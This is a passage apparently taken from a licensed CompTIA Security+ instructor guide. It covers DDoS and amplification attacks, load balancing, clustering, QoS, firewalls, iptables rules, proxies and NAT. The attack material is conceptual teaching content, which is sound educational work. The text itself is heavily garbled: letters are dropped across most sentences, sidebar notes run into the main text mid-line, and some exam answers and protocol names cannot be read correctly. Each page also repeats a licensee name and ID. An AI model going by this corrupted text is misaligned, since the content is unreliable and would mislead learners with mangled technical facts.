each access point more tamper-proof as there is no local administration interface.
Configuration errors should also be easier to identify.

3. What is a pre-shared key?

This is a type of group authentication used when the infrastructure for authenticating
securely via ADI , for instance is not available. The system depends on the strength
of the passphrase used for the key.

4. Is WPS a suitable authentication method for enterprise networks?

No, an enterprise network will use ADI authentication. uses and there are
weaknesses in the protocol.

5. You want to deploy a wireless network where only clients with domain-
issued di ital certificates can oin the net or hat t pe o authentication
mechanism is suitable?

A TL is the best choice because it re uires that both server and client be installed
with valid certificates.

6. ohn is i en a laptop or o cial use and is on a usiness trip hen he

arri es at his hotel he turns on his laptop and finds a ireless access
point ith the name o the hotel hich he connects to or sendin o cial
communications. He may become a victim of which wireless threat?

Evil twin.

esson Implementing Secure etwork esigns | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 247

Topic 9D
Implement Load Balancers

EXAM OBJECTIVES COVERED Teaching

1. Given a scenario, analyze potential indicators associated with network attacks Tip
3.3 Given a scenario, implement secure network designs As with the wireless
topic, we take the
opportunity to look at
A denial of service Do attack can be e tremely destructive and very difficult to mitigate. both a class of attack
DDo and a principal
As a network security professional, it is vital for you to be able to compare and contrast control to mitigate it
Do and distributed Do DDo methods and to be able to recommend and configure load balancing .
load balancing technologies that can make networks more resilient to these attacks.
Show Slide(s)
istri uted enial o er ice Attac s
Distributed Denial of
Most denial of service (DoS) attacks against websites and gateways are ervice Attacks
distributed DoS (DDoS). This means that the attack is launched from multiple hosts
simultaneously. Typically, a threat actor will compromise machines to use as handlers Teaching
in a command and control network. The handlers are used to compromise hundreds or Tip
thousands or millions of hosts with Do tools bots forming a botnet. oint out that
botnets can perform
ome types of DDo attacks simply aim to consume network bandwidth, denying it almost any function.
to legitimate hosts, by using overwhelming numbers of bots. thers cause resource pam, phishing,
e haustion on the hosts' processing re uests, consuming C cycles and memory. and cryptojacking
This delays processing of legitimate traffic and could potentially crash the host system are probably more
typical than DDoS.
completely. or e ample, a ood attac works by withholding the client's AC Stress that malware
packet during TC 's three way handshake. Typically the client's I address is spoofed, creation has become
meaning that an invalid or random I is entered so the server's N AC packet is professionalized
misdirected. A server, router, or firewall can maintain a ueue of pending connections, and now forms a
recorded in its state table. hen it does not receive an AC packet from the client, it substantial shadow
economy. efer
resends the N AC packet a set number of times before timing out the connection.
students to the
The problem is that a server may only be able to manage a limited number of pending following analysis of
connections, which the Do attack uickly fills up. This means that the server is unable the Mirai botnet as
to respond to genuine traffic. an e ample imperva.
com/blog/malware-
analysis-mirai-ddos-
Amplification Application and T Attac s botnet .

In a distributed re ection Do D Do or amplification N ood attack, the threat Show Slide(s)

actor spoofs the victim's I address and attempts to open connections with multiple
servers. Those servers direct their N AC responses to the victim server. This rapidly
Amplification,
consumes the victim's available bandwidth. Application, and T
Attacks
Application Attacks
Teaching
here a network attack uses low level techni ues, such as N or N AC ooding,
Tip
an application attack targets vulnerabilities in the headers and payloads of specific
We'll be revisiting
application protocols. or e ample, one type of amplification attac targets DNS
OT when covering
services with bogus queries. One of the advantages of this technique is that while embedded systems in
the re uest is small, the response to a DN uery can be made to include a lot of Lesson 12.
information, so this is a very e ective way of overwhelming the bandwidth of the victim
network with much more limited resources on the attacker's botnet.

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 248 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

The Network Time Protocol (NTP) can be abused in a similar way. NT helps servers
on a network and on the Internet to keep the correct time. It is vital for many protocols
and security mechanisms that servers and clients be synchroni ed. ne NT uery
monlist can be used to generate a response containing a list of the last machines
that the NT server has contacted. As with the amplification attac , this allows a
short request to direct a long response at the victim network.

Operational Technology (OT) Attacks

An operational technology (OT) network is established between embedded systems
devices and their controllers. The term "operational" is used because these system
monitor and control physical electromechanical components, such as valves, motors,
electrical switches, gauges, and sensors. DDo attacks against the controllers in such
networks can use the same techni ues as against computer networks. Also, because
of the limited processing ability of some controller types, older DDo techni ues, such
as murf cloud are.com learning ddos smurf ddos attack or ing of Death imperva.
com/learn/application-security/ping-of-death , can continue to be e ective against
embedded systems. The limited resources of these devices mean that DDoS can
rapidly overwhelm available memory or C time.

As well as being the target of an attack, embedded systems might be used as bots. Any type
of Internet-enabled device is vulnerable to compromise. This includes web-enabled cameras,
SOHO routers, and smart TVs and other appliances. This is referred to as an Internet of
Things (IoT) botnet.

Show Slide(s) Distributed Denial of Service Attack Mitigation

DDo attacks can be diagnosed by traffic spikes that have no legitimate e planation,
Distributed Denial
but can usually only be counteracted by providing high availability services, such as
of Service Attack
Mitigation load balancing and cluster services. In some cases, a stateful firewall can detect a DDo
attack and automatically block the source. owever, for many of the techni ues used
in DDo attacks, the source addresses will be randomly spoofed or launched by bots,
making it difficult to detect the source of the attack.

ropping traffic from blacklisted IP ranges using Security Onion I S.

(Screenshot used with permission from Security Onion.)

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 249

hen a network is faced with a DDo or similar ooding attack, an I can use either an
access control list ACL or a blackhole to drop packets for the a ected I address es . A
blackhole is an area of the network that cannot reach any other part of the network. The
blackhole option is preferred, as evaluating each packet in a multi gigabit stream against
ACLs overwhelms the processing resources available. A standard method of doing this
with border gateway protocol routing is called a remotely triggered blackhole
(RTBH) cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf . The blackhole
also makes the attack less damaging to the I 's other customers. ith both approaches,
legitimate traffic is discarded along with the DDo packets.
Another option is to use sinkhole routing so that the traffic ooding a particular I address
is routed to a di erent network where it can be analy ed. otentially some legitimate traffic
could be allowed through, but the real advantage is to identify the source of the attack
and devise rules to filter it. The target can then use low TTL DN records to change the I
address advertised for the service and try to allow legitimate traffic past the ood.

There are cloud oS mitigation services that can act as sinkhole network providers and try
to scrub ooded traffic.

Load Balancing Show Slide(s)

A load balancer distributes client requests across available server nodes in a farm or Load Balancing
pool. This is used to provision services that can scale from light to heavy loads, and to
provide mitigation against DDoS attacks. A load balancer also provides fault tolerance. If
there are multiple servers available in a farm, all addressed by a single name I address
via a load balancer, then if a single server fails, client re uests can be routed to another
server in the farm. ou can use a load balancer in any situation where you have multiple
servers providing the same function. amples include web servers, front end email
servers, and web conferencing, A conferencing, or streaming media servers.
There are two main types of load balancers
• Layer load balancer basic load balancers make forwarding decisions on I
address and TC D port values, working at the transport layer of the I model.

• Layer load balancer content switch as web applications have become more
comple , modern load balancers need to be able to make forwarding decisions
based on application level data, such as a re uest for a particular L or data types
like video or audio streaming. This re uires more comple logic, but the processing
power of modern appliances is sufficient to deal with this.

Topology of basic load balancing architecture. (Images 1 .com.)

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 250 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Scheduling
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling is
called round robin; this just means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each method
can also be weighted, using administrator set preferences or dynamic load information
or both.
The load balancer must also use some type of heartbeat or health check probe to verify
whether each node is available and under load or not. Layer 4 load balancers can only
make basic connectivity tests while layer appliances can test the application's state,
as opposed to only verifying host availability.

ource I A nit and ession ersistence

When a client device has established a session with a particular node in the server
farm, it may be necessary to continue to use that connection for the duration of the
session. ource I or session a nit is a layer 4 approach to handling user sessions. It
means that when a client establishes a session, it becomes stuck to the node that first
accepted the request.
An application-layer load balancer can use persistence to keep a client connected to a
session. ersistence typically works by setting a cookie, either on the node or in ected
by the load balancer. This can be more reliable than source I affinity, but re uires the
browser to accept the cookie.

Show Slide(s) Clusterin

Clustering
here load balancing distributes traffic between independent processing nodes,
clustering allows multiple redundant processing nodes that share data with one
Teaching another to accept connections. This provides redundancy. If one of the nodes in the
Tip cluster stops working, connections can failover to a working node. To clients, the
Where a load balancer
cluster appears to be a single server.
distributes client
requests between irtual I
available nodes,
clustering enables or e ample, you might want to provision two load balancer appliances so that if
load balancing "within" one fails, the other can still handle client connections. nlike load balancing with a
a group of servers. single appliance, the public I used to access the service is shared between the two
instances in the cluster. This is referred to as a virtual I or shared or oating address.
The instances are configured with a private connection, on which each is identified by
its real I address. This connection runs some type of redundancy protocol, such as
Common Address edundancy rotocol CA , that enables the active node to own
the virtual I and respond to connections. The redundancy protocol also implements
a heartbeat mechanism to allow failover to the passive node if the active one should
su er a fault.

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 251

Topology of clustered load balancing architecture. (Images 1 .com.)

Active/Passive (A/P) and Active/Active (A/A) Clustering

In the previous e ample, if one node is active, the other is passive. This is referred to
as active passive clustering. The ma or advantage of active passive configurations is
that performance is not adversely a ected during failover. owever, the hardware and
operating system costs are higher because of the unused capacity.
An active/active cluster means that both nodes are processing connections
concurrently. This allows the administrator to use the maximum capacity from
the available hardware while all nodes are functional. In the event of a failover
the workload of the failed node is immediately and transparently shifted onto the
remaining node. At this time, the workload on the remaining nodes is higher and
performance is degraded.

In a standard active passive configuration, each active node must be matched by a passive
node. There are +1 and + configurations that provision fewer passive nodes than active
nodes, to reduce costs.

Application Clustering
Clustering is also very commonly used to provision fault tolerant application services.
If an application server su ers a fault in the middle of a session, the session state data
will be lost. Application clustering allows servers in the cluster to communicate session
information to one another. or e ample, if a user logs in on one instance, the ne t
session can start on another instance, and the new server can access the cookies or
other information used to establish the login.

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 252 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Quality of Service (QoS)

uality of ervice
Most network appliances process packets on a best e ort and first in, first out I
o basis. Quality of Service (QoS) is a framework for prioriti ing traffic based on its
characteristics. It is primarily used to support voice and video applications that require
Teaching a minimum level of bandwidth and are sensitive to latency and jitter. Latency is the
Tip time it takes for a transmission to reach the recipient, measured in milliseconds ms .
ou might also want to Jitter is defined as being a variation in the delay, or an inconsistent rate of packet
mention multiprotocol delivery. FIFO-based delivery makes it more likely that other applications sharing the
label switching M L same network will cause loss of bandwidth and increase latency and jitter for a real-
as a common means time service.
of implementing o .
This is in the syllabus Implementing o is a comple pro ect, as there are many di erent ways to do it, and
acronym list, but is many di erent protocols and appliances involved. In overview, a o implementation
only covered as a could work as follows
glossary term in this
course. 1. The organi ation performs application discovery to identify bandwidth, latency,
and jitter thresholds of the protocols in use and determine their relative priority.
The applications are then mapped to standard class of service Co codes at
layer and layer . These codes are configured across the range of hosts and
intermediate systems that handle o traffic.

2. A o compatible endpoint device or application uses the i er field in the

I header layer and adds an . p field to the thernet header layer to
indicate that the packet should be treated as priority traffic marking . It transmits
the frame to the switch.

3. If the switch supports o , it uses the . p header to prioriti e the frame. Note
that it can only do this by holding a ueue of outgoing traffic and delaying non
priority frames. If the ueue is full, a traffic policing policy must state whether
non priority frames should be dropped, or whether the ueue should be cleared
at the e pense of reducing o .

4. A similar process occurs at routers and load balancers on the network edge,
though they can inspect the Di erv I packet header, rather than having to rely
on the more limited . p header. Note that prioriti ation always takes place on
the outbound interface, with low priority traffic being held in a ueue.

There are many variations on this process. odern layer switches can inspect SCP
values, rather than relying on 0 .1p tagging, for instance. oS may need to take place over
wireless networks, which use a different tagging mechanism. There is also a wholly different
approach to oS called IntServ. This uses the esource eservation Protocol ( S P) to
negotiate a link with the performance characteristics re uired by the application or policy.

o marking introduces the potential for Do attacks. If a threat actor can craft
packets that are treated as high priority and send them at a high rate, the network
can be overwhelmed. art of o involves identifying trust boundaries to establish a
legitimate authority for marking traffic. ou should also ensure that there is always
sufficient bandwidth for security critical monitoring data and network management
configuration traffic.

or more information, consider these case studies and design overviews from icrosoft
(docs.microsoft.com en-us skypeforbusiness optimizing-your-network expressroute-and-
os-in-skype-for-business-online) and Cisco (cisco.com c en us td docs solutions Enterprise
A and A oS S oS-S - ook oSIntro.html).

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 253

Review Activity:
Load Balancers
Answer the following uestions

1. Why are many network DoS attacks distributed?

Most attacks depend on overwhelming the victim. This typically requires a large
number of hosts, or bots.

2. hat is an amplification attac

here the attacker spoofs the victim's I in re uests to several re ecting servers often
DN or NT servers . The attacker crafts the re uest so that the re ecting servers
respond to the victim's I with a large message, overwhelming the victim's bandwidth.

3. What is meant by scheduling in the context of load balancing?

The algorithm and metrics that determine which node a load balancer picks to handle a
request.

4. What mechanism provides the most reliable means of associating a client

with a particular server node when using load balancing?

ersistence is a layer mechanism that works by in ecting a session cookie. This is

generally more reliable than the layer source I affinity mechanism.

5. True or false? A virtual IP is a means by which two appliances can be put in a

ault tolerant confi uration to respond to re uests or the same I address

True.

6. hat field pro ides tra c mar in or a o s stem at la er

Layer refers to the Di erv field in the I header.

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 254 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 9
Summary
Teaching ou should be able to use segmentation based network designs and provision
Tip switching, routing, i i, and load balancing technologies for secure network access.
Check that students
are confident about
the content that has
uidelines or Implementin ecure et or esi ns
been covered. If there
ollow these guidelines when you implement designs for new or e tended networks
is time, re visit any
content examples that • Identify business work ows and the servers, clients, and protocols that support
they have questions them. Design segmented network zones or blocks that support the security
about. If you have
used all the available
re uirements, using LANs, subnets, and firewall policies to implement the design.
time for this lesson
block, note the issues,
• Accommodate special re uirements within the design
and schedule time for
a review later in the
• Demilitarized zone topologies for Internet-facing hosts.
course.
• East-west and zero trust designs for data centers.

• ecure implementation of I v addressing.

• Deploy switching and routing appliances and protocols to support each block,
accounting for loop protection, port security, and route security.

• elect an appropriate authentication mechanism for i i networks

• nterprise authentication with an A method A TL , A TTL , or A

provides the best security.

• re shared key or personal authentication should be configured with a

character passphrase, and use A if there are no compatibility issues.

• pen authentication can be used for guest networks, so long as the risks are
understood.

• Evaluate risks from denial of service and design load balanced and clustered
services to provision high availability and fault tolerance.

• valuate re uirements for uality of service mechanisms, such as supporting voice

over I and conferencing.

Lesson 9: Implementing Secure Network Designs

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 10
Implementing Network
Security Appliances

LESSON INTRODUCTION Teaching

Tip
In addition to the secure switching and routing appliances and protocols used to Continuing
implement network connectivity, the network infrastructure design must also include the protecting
security appliances to ensure confidentiality, integrity, and availability of services and infrastructure theme,
data. ou should be able to distinguish the features of security and monitoring devices this lesson looks at the
and software and deploy these devices to appropriate locations in the network. security appliances
and software used to
implement firewalls,
Lesson Objectives pro y services,
intrusion detection/
In this lesson, you will: prevention, and
logging/alerting.
• Implement firewalls and pro y servers.

• Implement network security monitoring.

• Summarize the use of SIEM.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 256 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic A
Implement ire alls and roxy Ser ers

Teaching EXAM OBJECTIVES COVERED

Tip 3.3 Given a scenario, implement secure network designs
Emphasize the
di erent firewall and
content filter types
The firewall is one of the longest serving types of network security control, developed
and the ways they can
be implemented on to segregate some of the first Internet networks in the s. ince those early
hosts and appliances days, firewall types and functionality have both broadened and deepened. As a
for placement at network security professional, a very large part of your workday will be taken up with
di erent locations in implementing, configuring, and troubleshooting firewalls and pro ies.
the network.

Show Slide(s) ac et ilterin ire alls

Packet Filtering
acket filtering describes the earliest type of network firewall. All firewalls can still
irewalls perform this basic function.

Teaching Access Control Lists (ACLs)

Tip
Students need to
A pac et filterin firewall is configured by specifying a group of rules, called an access
be able to interpret control list ACL . ach rule defines a specific type of data packet and the appropriate
firewall ACLs. action to take when a packet matches the rule. An action can be either to deny block
or drop the packet, and optionally log an event or to accept let the packet pass
through the firewall . A packet filtering firewall can inspect the headers of I packets.
This means that rules can be based on the information found in those headers
• I filtering accepting or denying traffic on the basis of its source and or destination
IP address.

• rotocol ID type TC , D , ICM , routing protocols, and so on .

• ort filtering security accepting or denying a packet on the basis of source and
destination port numbers TC or D application type .

There may be additional functionality in some products, such as the ability to block
some types of ICM ping traffic but not others, or the ability to filter by hardware
MAC address. Another distinction that can be made is whether the firewall can control
only inbound traffic or both inbound and outbound traffic. This is also often referred to
as ingress and egress traffic or filtering. Controlling outbound traffic is useful because it
can block applications that have not been authori ed to run on the network and defeat
malware, such as backdoors. Ingress and egress traffic is filtered using separate ACLs.

Stateless Operation
A basic packet filtering firewall is stateless. This means that it does not preserve
information about network sessions. ach packet is analy ed independently, with
no record of previously processed packets. This type of filtering re uires the least
processing e ort, but it can be vulnerable to attacks that are spread over a se uence
of packets. A stateless firewall can also introduce problems in traffic ow, especially
when some sort of load balancing is being used or when clients or servers need to use
dynamically assigned ports.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 257

Stateful Inspection Firewalls Show Slide(s)

A stateful inspection firewall addresses these problems by tracking information about Stateful Inspection
the session established between two hosts, or blocking malicious attempts to start a Firewalls
bogus session. The vast ma ority of firewalls now incorporate some level of stateful
inspection capability. ession data is stored in a state table. When a packet arrives, the Teaching
firewall checks it to confirm whether it belongs to an e isting connection. If it does not, Tip
it applies the ordinary packet filtering rules to determine whether to allow it. nce the Note that very few,
connection has been allowed, the firewall usually allows traffic to pass unmonitored, in if any, firewalls are
order to conserve processing e ort. wholly stateless
anymore. The
principal distinction
is between firewalls
that track state at the
transport layer and
those that can monitor
application sessions.

State table in the pfSense firewall appliance. (Screenshot used with permission
from ubicon Communications, C.)

Stateful inspection can occur at two layers: transport and application.

Transport Layer (OSI Layer 4)

At the transport layer, the firewall e amines the TC three way handshake to
distinguish new from established connections. A legitimate TC connection should
follow a N N AC AC se uence to establish a session, which is then tracked
using se uence numbers. Deviations from this, such as N without AC or se uence
number anomalies, can be dropped as malicious ooding or session hi acking
attempts. The firewall can be configured to respond to such attacks by blocking source
IP addresses and throttling sessions. It can also track UDP connections, though this
is harder as D is a connectionless protocol. It is also likely to be able to detect I
header and ICMP anomalies.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 258 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

pfSense firewall rule configuration Advanced settings allow maximums for states and
connections to be applied. (Screenshot used with permission from pfsense.org.)

Application Layer (OSI Layer 7)

An application aware firewall can inspect the contents of packets at the application
layer. ne key feature is to verify the application protocol matches the port to verify
that malware isn't sending raw TC data over port ust because port is open,
for instance. As another e ample, a web application firewall could analy e the TT
headers and the TML code present in TT packets to try to identify code that
matches a pattern in its threat database. Application aware firewalls have many
di erent names, including application layer gateway, stateful multilayer inspection,
or deep packet inspection. Application aware devices have to be configured with
separate filters for each type of traffic TT and TT , MT IMA , T , and
so on . Application a are fire alls are very powerful, but they are not invulnerable.
Their very comple ity means that it is possible to craft Do attacks against e ploitable
Show Slide(s) vulnerabilities in the firewall firmware. Also, the firewall cannot e amine encrypted
data packets, unless configured with an L TL inspector.
iptables

Teaching
iptables
Tip iptables is a command line utility provided by many Linu distributions that allows
iptables is referenced administrators to edit the rules enforced by the Linu kernel firewall linu .die.net
in Network , but not man iptables . iptables works with chains, which apply to the di erent types of
in Security+, so we traffic, such as the IN T chain for traffic destined for the local host. ach chain has
include it here as a
recap. If students
a default policy set to D or ALL traffic that does not match a rule. ach rule,
have not completed processed in order, determines whether traffic matching the criteria is allowed or
Network+, make sure dropped.
they know the basics
of how it operates The command iptables --list INPUT --line-numbers -n will show
and how to read the the contents of the IN T chain with line numbers and no name resolution. The rules
output. in the following e ample drop any traffic from the specific host at . . . and allow

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 259

ICM echo re uests pings , DN , and TT TT traffic either from the local subnet
. . . or from any network . . .
Chain INPUT (policy DROP)
# target prot opt source destination
1 DROP all -- 10.1.0.192 0.0.0.0/0
2 ACCEPT icmp -- 10.10.0.0/24 0.0.0.0/0 icmptype 8
3 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
4 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
5 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:80
6 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:443
7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ctstate
RELATED,ESTABLISHED
The destination . . . means anywhere. hen set on the IN T chain, the e ect
is to match any IP address that the local host is currently using. The ctstate rule is
a stateful rule that allows any traffic that is part of an established or related session. Show Slide(s)
As established connections should already have been allowed, this reduces processing
re uirements to minimi e impact on traffic ow.
Firewall
The following command will insert a new rule as line to allow traffic to the server Implementation
TC port from the local subnet
Teaching
iptables -I INPUT 2 -p tcp -s 10.1.0.0/24 --dport 22 Tip
-j ACCEPT
irewalls can be
Di erent switches can be used to append -A , delete -D , or replace -R rules. implemented in
many di erent
ways. They are often
ire all Implementation implemented as a
function within a
ou should consider how the firewall is implemented as hardware or software, for product, as well as
the dedicated security
instance to cover a given placement or use on the network. ome types of firewalls
appliances.
are better suited for placement at the network edge or onal borders others are
designed to protect individual hosts. Interaction
Opportunity
Firewall Appliances
As with most of these
An appliance fire all is a stand alone hardware firewall deployed to monitor traffic security appliances,
it is best to look at
passing into and out of a network one. A firewall appliance can be deployed in two the features of actual
ways: products, rather than
depend too much
• outed layer the firewall performs forwarding between subnets. ach interface
on categorizations.
on the firewall connects to a di erent subnet and represents a di erent security Refer students to
zone. vendor sites such
as barracuda.
• ridged layer the firewall inspects traffic passing between two nodes, such com, checkpoint.
as a router and a switch. This is also referred to as transparent mode. The firewall com,fortinet.com,
does not have an I interface e cept for configuration management . It bridges the or pfsense.org. Get
thernet interfaces between the two nodes. Despite performing forwarding at layer students to visit one
site per group and
, the firewall can still inspect and filter traffic on the basis of the full range of packet then compare features
headers. The typical use case for a transparent firewall is to deploy it without having supported by the
to reconfigure subnets and reassign I addresses on other devices. di erent vendors.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 260 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Cisco ASA (Adaptive Security Appliance) AS (Adaptive Security evice anager) interface.
(Screenshot used with permission from Cisco.)

A router fire all or firewall router appliance implements filtering functionality as part
of the router firmware. The di erence is that a router appliance is primarily designed
for routing, with firewall as a secondary feature. Internet router modems come
with a firewall built in, for e ample.

Application-Based Firewalls
Firewalls can also run as software on any type of computing host. There are several
types of application based firewalls
• ost ased fire all (or personal fire all implemented as a software
application running on a single host designed to protect that host only. As well as
enforcing packet filtering ACLs, a personal firewall can be used to allow or deny
software processes from accessing the network.

• Application fire all software designed to run on a server to protect a particular

application only a web server firewall, for instance, or a firewall designed to protect
Show Slide(s) an L erver database . This is a type of host based firewall and would typically be
deployed in addition to a network firewall.
ro ies and ateways
• et or operatin s stem fire all a software based firewall running
Teaching under a network server , such as indows or Linu . The server would function as
Tip a gateway or pro y for a network segment.
Point out that many
pro y servers are
used to implement
ro ies and ate a s
application layer
firewalls, but they can
A firewall that performs application layer filtering is likely to be implemented as a
also improve client pro y. here a network firewall only accepts or blocks traffic, a proxy server works
performance (through on a store and forward model. The pro y deconstructs each packet, performs analysis,
a caching engine . then rebuilds the packet and forwards it on, providing it conforms to the rules.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 261

The amount of rebuilding depends on the proxy. Some proxies may only manipulate the
IP and TCP headers. Application-aware proxies might add or remote TTP headers. A deep
packet inspection proxy might be able to remove content from an TTP payload.

Forward Proxy Servers

A forward pro y provides for protocol specific outbound traffic. or e ample, you
might deploy a web pro y that enables client computers on the LAN to connect to
websites and secure websites on the Internet. This is a forward pro y that services TC
ports and for outbound traffic.

Configuring content filter settings for the S uid proxy server (s uid-cache.org) running on pfSense.
The filter can apply AC s and time-based restrictions, and use blacklists to prohibit access to U s.
(Screenshot used with permission from ubicon Communications, C.)

The main benefit of a pro y is that client computers connect to a specified point on
the perimeter network for web access. The pro y can be positioned within a DM .
This provides for a degree of traffic management and security. In addition, most web
pro y servers provide caching engines, whereby fre uently re uested web pages
are retained on the pro y, negating the need to re fetch those pages for subse uent
re uests.
A pro y server must understand the application it is servicing. or e ample, a web
pro y must be able to parse and modify TT and TT commands and potentially
TML and scripts too . ome pro y servers are application specific others are
multipurpose. A multipurpose pro y is one configured with filters for multiple protocol
types, such as TT , T , and MT .
ro y servers can generally be classed as non transparent or transparent.
• A non-transparent proxy means that the client must be configured with the pro y
server address and port number to use it. The port on which the pro y server
accepts client connections is often configured as port .auto

• A transparent (or forced or intercepting) proxy intercepts client traffic without

the client having to be reconfigured. A transparent pro y must be implemented on a
switch or router or other inline network appliance.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 262 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring transparent proxy settings for the S uid proxy server (s uid-cache.org) running on pfSense.
(Screenshot used with permission from ubicon Communications, C.)

oth types of pro y can be configured to re uire users to be authenticated before

allowing access. The pro y is likely to be able to use to do this without having to
prompt the user for a password.

A proxy autoconfiguration (PAC) script allows a client to configure proxy settings without
user intervention. The eb Proxy Autodiscovery ( PA ) protocol allows browsers to locate
a PAC file. This can be an attack vector, as a malicious proxy on the local network can be
used to obtain the user s hash as the browser tries to authenticate (nopsec.com/responder-
beyond-wpad).

Reverse Proxy Servers

A reverse proxy server provides for protocol specific inbound traffic. or security
purposes, you might not want e ternal hosts to be able to connect directly to
application servers, such as web, email, and oI servers. Instead, you can deploy a
reverse pro y on the network edge and configure it to listen for client re uests from a
public network the Internet . The pro y applies filtering rules and if accepted, it creates
the appropriate re uest for an application server within a DM . In addition, some
reverse pro y servers can handle application specific load balancing, traffic encryption,
and caching, reducing the overhead on the application servers.

Show Slide(s) Access Control Lists

Access Control Lists
irewall access control lists ACLs are configured on the principle of least access.
This is the same as the principle of least privilege only allow the minimum amount of
Teaching traffic re uired for the operation of valid network services and no more. The rules in a
Tip firewall's ACL are processed top to bottom. If traffic matches one of the rules, then it is
mphasi e firewall
allowed to pass conse uently, the most specific rules are placed at the top. The final
rule processing and default rule is typically to block any traffic that has not matched a rule implicit deny .
the concept of implicit If the firewall does not have a default implicit deny rule, an e plicit deny all rule can be
deny. added manually to the end of the ACL.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 263

Sample firewall ruleset configured on pfSense. This ruleset blocks all traffic from bogon networks and
a specific private address range but allows any TTP, TTPS, or S TP traffic from any other source.
(Screenshot used with permission from ubicon Communications, C.)

ach rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database, the
tuples are the columns. or e ample, in the previous screenshot, the tuples include
rotocol, ource address , ource ort, Destination address , Destination ort, and
so on.
ven the simplest packet filtering firewall can be comple to configure securely. It is
essential to create a written policy describing what a filter ruleset should do and to test
the configuration as far as possible to ensure that the ACLs you have set up work as
intended. Also test and document changes made to ACLs. ome other basic principles
include:
• lock incoming re uests from internal or private I addresses that have obviously
been spoofed .

• lock incoming re uests from protocols that should only be functioning at a local
network level, such as ICM , D C , or routing protocol traffic.

• se penetration testing to confirm the configuration is secure. Log access attempts

and monitor the logs for suspicious activity.
Show Slide(s)
• Take the usual steps to secure the hardware on which the firewall is running and
use of the management interface. Network Address
Translation

Network Address Translation Teaching

Tip
Network address translation (NAT) was devised as a way of freeing up scarce IP
Make sure students
addresses for hosts needing Internet access. A private network will typically use a
can identify private
private addressing scheme to allocate I addresses to hosts. These addresses can be address ranges. Stress
drawn from one of the pools of addresses defined in C tools.ietf.org/html/ that NAT is not a
rfc as non routable over the Internet security mechanism,
without combining it
• . . . to . . . Class A private address range . with traffic filters.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 264 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• . . . to . . . Class private address range .

• . . . to . . . Class C private address range .

A NAT gateway is a service that translates between the private addressing scheme
used by hosts on the LAN and the public addressing scheme used by router, firewall,
or pro y server on the network edge. NAT provides security in the sense that it can
manage ingress and egress traffic at well defined points on the network edge, but it is
important to reali e that it does not perform a filtering function.
There are several types of NAT
• tatic and dynamic source NAT perform mappings between private inside
local network address and public inside global addresses. These mappings can
be static or dynamically assigned.

• verloaded NAT Network Address ort Translation NA T Port Address

Translation (PAT) provides a means for multiple private I addresses to be
